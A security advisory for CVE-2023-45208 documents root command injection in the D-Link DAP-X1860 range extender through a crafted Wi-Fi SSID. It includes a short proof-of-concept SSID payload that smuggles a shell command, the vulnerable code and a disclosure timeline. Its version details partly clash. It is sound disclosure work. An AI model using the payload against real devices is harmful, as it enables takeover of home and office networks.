Advisory: D-Link DAP-X1860: Remote Command Injection

The Wi-Fi network scanning functionality of the D-Link DAP-X1860 range
extender is susceptible to remote command injection. Attackers who
create a Wi-Fi network with a crafted SSID in range of the extender can
run shell commands during the setup process or when using the network
scan function of the range extender.

### Details

- Product: D-Link DAP-X1860
- Affected Versions: Tested on 1.00, 1.01b94, 1.01b05-01, other versions may be affected, too
- Fixed Versions: 1.00b12
- Vulnerability Type: Command Injection
- Security Risk: medium
- Vendor URL: `https://eu.dlink.com/de/de/products/dap-x1860-ax1800-mesh-wifi-6-range-extender`
- Vendor Status: fixed version released
- Advisory URL: `https://www.redteam-pentesting.de/advisories/rt-sa-2023-006`
- Advisory Status: published
- CVE: CVE-2023-45208
- CVE URL: `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45208`

### Introduction

The D-Link DAP-X1860 is a Mesh Wi-Fi 6 Range Extender.

### More Details

During the setup process of the range extender, nearby Wi-Fi networks are
identified using the SOAP action "GetSiteSurvey". If a Wi-Fi network with an
apostrophe (such as Olaf's Network) in its SSID is in range of the extender,
the setup process will crash repeatedly with the following response from the
server:

``` 
Error 500: Internal Server Error
CGI program sent malformed HTTP headers: [0   1   *****                **:**:**:**:**:**   WPA2PSK/AES 7        11b/g/n     NONE   In 17       YES      NO
1   1   *****               **:**:**:**:**:** WPA2PSK/AES            24       11b/g/n     NONE   In 13 YES      NO
2   1   *****               **:**:**:**:**:** WPA2PSK/AES            47       11b/g/n/ax  NONE   In 13 YES      NO
3   1   *****               **:**:**:**:**:** WPAPSKWPA2PSK/TKIPAES  81       11b/g/n     NONE   In 7 YES      NO
4   1   *****               **:**:**:**:**:** WPA2PSKWPA3PSK/AES     63       11b/g/n/ax  NONE   In 19 YES      NO
5   1   *****               **:**:**:**:**:** WPA2PSK/AES            44       11b/g/n/ax  NONE   In 5 NO      NO
6   1   Olafs Network **:**:**:**:**:** WPA2PSK/AES 47 11b/g/n/ax NONE In 20 NO NO
sh: 7: not found
sh
```

The output sh: 7: not found indicates that the extender attempted to
execute some command and the apostrophe that was originally present in
the Wi-Fi network Olaf's Network is missing in the output.
Additionally, the sixth line does not have the same alignment of spaces
compared to the other lines.

This alone can be exploited as a denial-of-service-vulnerability as the
setup process cannot be finished. However, it was also possible to
execute arbitrary commands on the extender. For instance, it was
attempted to inject the command uname -a which lists general kernel
information. To do this, a Wi-Fi network within range was created with a
SSID starting with a single quote and the command separated by the
logical shell operator "&&". The network was started using create_ap
 (<https://github.com/oblique/create_ap>):

``` 
$ create_ap -n wlan0 "Test' && uname -a &&" randompw98zwrd8g283d3
```

After rescanning for Wi-Fi networks on the range extender, this results in an
HTTP 500 error code, including the output of the injected command:

``` 
Error 500: Internal Server Error
CGI program sent malformed HTTP headers: [0   1   *****                **:**:**:**:**:**   WPA2PSK/AES 0        11b/g/n     NONE   In 17       YES      NO
1   1   Test
Linux dlink-rp 4.4.198 #3 SMP Mon Jan 11 10:38:51 CST 2021 mips GNU/Linux
sh: **:**:**:**:**:**: not found
sh: 2: not found
sh: 3: not found
sh: 4: not found
[...]
sh: 40: not
```

As can be seen, the command was executed and its output was printed in the
response. Further analysis of the device revealed that all processes on the
device including the injected commands run as the high-privileged root user.

The vulnerability originates from the parsing_xml_stasurvey function in
libcgifunc.so, where a system command is executed containing the SSIDs from the
Wi-Fi scan results without proper escaping:

``` 
[...]
snprintf(acStack_1a0,100,"echo %s > /tmp/Channel_check",&scanned_ap_info);
system(acStack_1a0);
[...]
```

### Proof of Concept

Create a Wi-Fi network with an SSID containing a single quote, followed
by some shell command separator, e.g. "&&" and the command to be run. In the
following, create_ap (<https://github.com/oblique/create_ap>) was used to create the Wi-Fi network:

``` 
$ create_ap -n wlan0 "Test' && uname -a &&" random98zwrd8g283d3
```

To trigger the exploit, run the setup process of the range extender, or if it is
already configured, run a network scan. The output of the command can be seen in
HTTP responses of the extender's web interface.

### Security Risk

Attackers that are physically located in the Wi-Fi range of the extender
may leverage this vulnerability to obtain access to the extender's local
network. While the injected commands are only executed during device
setup or during a manual Wi-Fi scan, attackers could try to
de-authenticate the extender such that the owner triggers a Wi-Fi scan
to make the extender work again. As a result, this vulnerability is
rated to pose a medium risk.

### Timeline

- 2023-05-06 Vulnerability identified
- 2023-05-08 Reported to `security@dlink.com`
- 2023-06-19 After receiving no reply, a reminder was sent to `security@dlink.com`
- 2023-07-21 After again receiving no reply, a D-Link security contact known from  
  a previous disclosure was notified directly
- 2023-08-07 After again receiving no reply, another reminder sent to  
  `security@dlink.com`
- 2023-10-05 CVE ID requested
- 2023-10-05 CVE ID assigned
- 2023-10-09 Advisory released
- 2023-10-25 Hotfix patch released by vendor  (<https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10360>)
- 2023-11-16 RedTeam Pentesting contacted vendor via support chat as hotfix patch  
  cannot be installed due to a wrong firmware format
- 2023-11-17 Vendor sent firmware (DAPX1860A1_FW101B05_20231107_beta01.bin) with  
  patch in correct format
- 2023-11-23 RedTeam Pentesting confirmed that the vulnerability is still present  
  and informed the vendor
- 2023-11-24 Vendor replied
- 2023-12-21 Vendor sent RedTeam Pentesting a new firmware  
  (DAP-X1860_RevA_Firmware_101b05-01_20231219.bin) for confirmation
- 2024-01-03 RedTeam Pentesting confirmed that the vulnerability is fixed
- 2024-01-03 Vendor released firmware 1.01b05-01 on product website  (<https://eu.dlink.com/de/de/products/dap-x1860-ax1800-mesh-wifi-6-range-extender>)

### RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
<https://www.redteam-pentesting.de/>

### Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
<https://jobs.redteam-pentesting.de/>